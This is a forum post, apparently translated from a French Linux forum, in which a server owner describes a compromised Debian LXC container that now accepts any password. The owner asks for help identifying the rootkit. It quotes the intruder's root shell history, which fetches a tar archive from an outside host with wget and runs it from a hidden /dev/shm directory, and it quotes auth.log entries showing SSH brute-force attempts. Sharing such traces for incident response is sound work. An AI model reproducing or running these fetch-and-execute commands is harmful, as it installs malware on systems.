URL: https://linuxfr.org/forums/linux-general/posts/machine-compromise Title: Machine compromise. Authors: JM Baty Date: 2013年07月08日T15:23:04+02:00 License: CC By-SA Tags: Score: 14

Hi,

I have just discovered, to my horror, that I have a compromised machine. It is a web/mail/file/multimedia server running in an lxc container. The host and the machine are both on debian/wheezy.

For now I have stopped the machine, closed the ports on the box, and replaced and checked most of the binaries, but on reboot the machine accepts any password for any user, including root. On a console the system does not even ask me for a password; if I give a valid login name, I am logged in directly!! I cannot see by what devilry the system behaves this way.

And yet whoever hacked my machine does not look like a top player, given that he left plenty of traces. Here is what he ran as root:

    w
    id
    id
    cd /dev/shm
    ls -a
    rm -rf flood
    cd ~
    ls -a
    cd .ssh
    ls -a
    cat known_hosts
    cat /proc/cpuinfo |grep proc
    cd /dev/shm
    ls -a
    mkdir " "
    wget http://kao.at.ua/tobi.tar
    tar zxvf tobi.tar
    tar xvf tobi.tar
    rm -rf tobi.tar
    cd tobi1
    ls -a
    nano 1
    cat 1
    ./start
    chmod +x *
    ./start 5
    w
    cd ~
    ls -a
    cat /etc/issue
    cd /dev/shm
    ls -a
    cd tobi1
    ls -a
    ./start
    ./start 130

So we can see that he went and fetched a rootkit and installed it, but I cannot identify the rootkit in question, nor what exactly it does. The only thing that is certain is that it contains binaries to replace sshd, ss, sz, pico and two or three other odds and ends. I put the wheezy binaries back, but that changes nothing.

Otherwise, here are the traces I found in /var/auth.log:

    Jun 28 11:25:24 lot sshd[13885]: Accepted password for root from 37.200.68.143 port 35605 ssh2
    Jun 28 11:25:45 lot sshd[13885]: Received disconnect from 37.200.68.143: 11: Bye Bye
    Jun 28 11:27:45 lot sshd[13900]: Accepted password for root from 37.200.68.143 port 43837 ssh2
    Jun 28 11:28:06 lot sshd[13900]: Received disconnect from 37.200.68.143: 11: Bye Bye
    Jun 28 11:28:32 lot sshd[13910]: Accepted password for root from 5.99.129.34 port 57216 ssh2
    Jun 28 11:30:06 lot sshd[13952]: Invalid user oracle from 37.200.68.143
    Jun 28 11:30:06 lot sshd[13952]: input_userauth_request: invalid user oracle [preauth]
    Jun 28 11:30:06 lot sshd[13952]: Failed password for invalid user oracle from 37.200.68.143 port 52070 ssh2
    Jun 28 11:30:06 lot sshd[13952]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:31:15 lot sshd[13979]: Accepted password for root from 5.99.129.34 port 57229 ssh2
    Jun 28 11:31:16 lot sshd[13979]: subsystem request for sftp by user root
    Jun 28 11:32:13 lot sshd[13992]: Accepted password for root from 5.99.129.34 port 57233 ssh2
    Jun 28 11:32:14 lot sshd[13992]: subsystem request for sftp by user root
    Jun 28 11:32:27 lot sshd[13996]: Accepted password for test from 37.200.68.143 port 60302 ssh2
    Jun 28 11:32:48 lot sshd[13998]: Received disconnect from 37.200.68.143: 11: Bye Bye
    Jun 28 11:33:58 lot sshd[14015]: Accepted password for root from 5.99.129.34 port 57239 ssh2
    Jun 28 11:33:59 lot sshd[14015]: subsystem request for sftp by user root
    Jun 28 11:34:48 lot sshd[14023]: Invalid user levente from 37.200.68.143
    Jun 28 11:34:48 lot sshd[14023]: input_userauth_request: invalid user levente [preauth]
    Jun 28 11:34:48 lot sshd[14023]: Failed password for invalid user levente from 37.200.68.143 port 40301 ssh2
    Jun 28 11:34:48 lot sshd[14023]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:36:36 lot sshd[14060]: Accepted password for root from 5.99.129.34 port 57248 ssh2
    Jun 28 11:36:37 lot sshd[14060]: subsystem request for sftp by user root
    Jun 28 11:37:10 lot sshd[14068]: Invalid user linux from 37.200.68.143
    Jun 28 11:37:10 lot sshd[14068]: input_userauth_request: invalid user linux [preauth]
    Jun 28 11:37:10 lot sshd[14068]: Failed password for invalid user linux from 37.200.68.143 port 48533 ssh2
    Jun 28 11:37:10 lot sshd[14068]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:39:31 lot sshd[14095]: Invalid user nagios from 37.200.68.143
    Jun 28 11:39:31 lot sshd[14095]: input_userauth_request: invalid user nagios [preauth]
    Jun 28 11:39:31 lot sshd[14095]: Failed password for invalid user nagios from 37.200.68.143 port 56767 ssh2
    Jun 28 11:39:31 lot sshd[14095]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:41:52 lot sshd[14134]: Invalid user media from 37.200.68.143
    Jun 28 11:41:52 lot sshd[14134]: input_userauth_request: invalid user media [preauth]
    Jun 28 11:41:52 lot sshd[14134]: Failed password for invalid user media from 37.200.68.143 port 36785 ssh2
    Jun 28 11:41:52 lot sshd[14134]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:44:14 lot sshd[14152]: Invalid user cvs from 37.200.68.143
    Jun 28 11:44:14 lot sshd[14152]: input_userauth_request: invalid user cvs [preauth]
    Jun 28 11:44:14 lot sshd[14152]: Failed password for invalid user cvs from 37.200.68.143 port 45018 ssh2
    Jun 28 11:44:14 lot sshd[14152]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:46:35 lot sshd[14184]: Invalid user dms from 37.200.68.143
    Jun 28 11:46:35 lot sshd[14184]: input_userauth_request: invalid user dms [preauth]
    Jun 28 11:46:35 lot sshd[14184]: Failed password for invalid user dms from 37.200.68.143 port 53249 ssh2
    Jun 28 11:46:35 lot sshd[14184]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:48:56 lot sshd[14199]: Invalid user xbmc from 37.200.68.143
    Jun 28 11:48:56 lot sshd[14199]: input_userauth_request: invalid user xbmc [preauth]
    Jun 28 11:48:56 lot sshd[14199]: Failed password for invalid user xbmc from 37.200.68.143 port 33248 ssh2
    Jun 28 11:48:56 lot sshd[14199]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:51:18 lot sshd[14235]: Accepted password for daemon from 37.200.68.143 port 41481 ssh2
    Jun 28 11:51:39 lot sshd[14238]: Received disconnect from 37.200.68.143: 11: Bye Bye
    Jun 28 11:53:39 lot sshd[14255]: Invalid user postfix from 37.200.68.143
    Jun 28 11:53:39 lot sshd[14255]: input_userauth_request: invalid user postfix [preauth]
    Jun 28 11:53:39 lot sshd[14255]: Failed password for invalid user postfix from 37.200.68.143 port 49713 ssh2
    Jun 28 11:53:39 lot sshd[14255]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:56:00 lot sshd[14288]: Invalid user ferenc from 37.200.68.143
    Jun 28 11:56:00 lot sshd[14288]: input_userauth_request: invalid user ferenc [preauth]
    Jun 28 11:56:00 lot sshd[14288]: Failed password for invalid user ferenc from 37.200.68.143 port 57945 ssh2
    Jun 28 11:56:01 lot sshd[14288]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 11:58:22 lot sshd[14313]: Invalid user andrea from 37.200.68.143
    Jun 28 11:58:22 lot sshd[14313]: input_userauth_request: invalid user andrea [preauth]
    Jun 28 11:58:22 lot sshd[14313]: Failed password for invalid user andrea from 37.200.68.143 port 37944 ssh2
    Jun 28 11:58:22 lot sshd[14313]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 12:00:43 lot sshd[14348]: Invalid user testuser from 37.200.68.143
    Jun 28 12:00:43 lot sshd[14348]: input_userauth_request: invalid user testuser [preauth]
    Jun 28 12:00:43 lot sshd[14348]: Failed password for invalid user testuser from 37.200.68.143 port 46177 ssh2
    Jun 28 12:00:43 lot sshd[14348]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 12:01:35 lot sshd[14356]: Accepted password for daemon from 5.99.129.34 port 57359 ssh2
    Jun 28 12:02:33 lot sshd[14384]: Accepted password for daemon from 5.99.129.34 port 57363 ssh2
    Jun 28 12:02:33 lot sshd[14386]: subsystem request for sftp by user daemon
    Jun 28 12:03:04 lot sshd[14396]: Invalid user svn from 37.200.68.143
    Jun 28 12:03:04 lot sshd[14396]: input_userauth_request: invalid user svn [preauth]
    Jun 28 12:03:04 lot sshd[14396]: Failed password for invalid user svn from 37.200.68.143 port 54408 ssh2
    Jun 28 12:03:04 lot sshd[14396]: Received disconnect from 37.200.68.143: 11: Bye Bye [preauth]
    Jun 28 18:06:28 lot sshd[18301]: Accepted password for daemon from 94.37.167.58 port 57191 ssh2
    Jul 3 18:03:28 lot sshd[32468]: Accepted password for daemon from 94.37.214.231 port 55940 ssh2
    Jul 3 18:04:25 lot su[32485]: No passwd entry for user 'su'
    Jul 3 18:04:25 lot su[32485]: FAILED su for su by daemon
    Jul 3 18:04:25 lot su[32485]: - /dev/pts/1 daemon:su
    Jul 3 18:04:28 lot su[32486]: Successful su for root by daemon
    Jul 3 18:04:28 lot su[32486]: + /dev/pts/1 daemon:root
    Jul 4 11:18:53 lot sshd[27384]: Accepted password for root from 94.37.205.157 port 50946 ssh2
    Jul 4 13:34:03 lot sshd[4414]: Accepted password for root from 5.99.129.34 port 56633 ssh2

Thanks in advance for any lead,
JMB
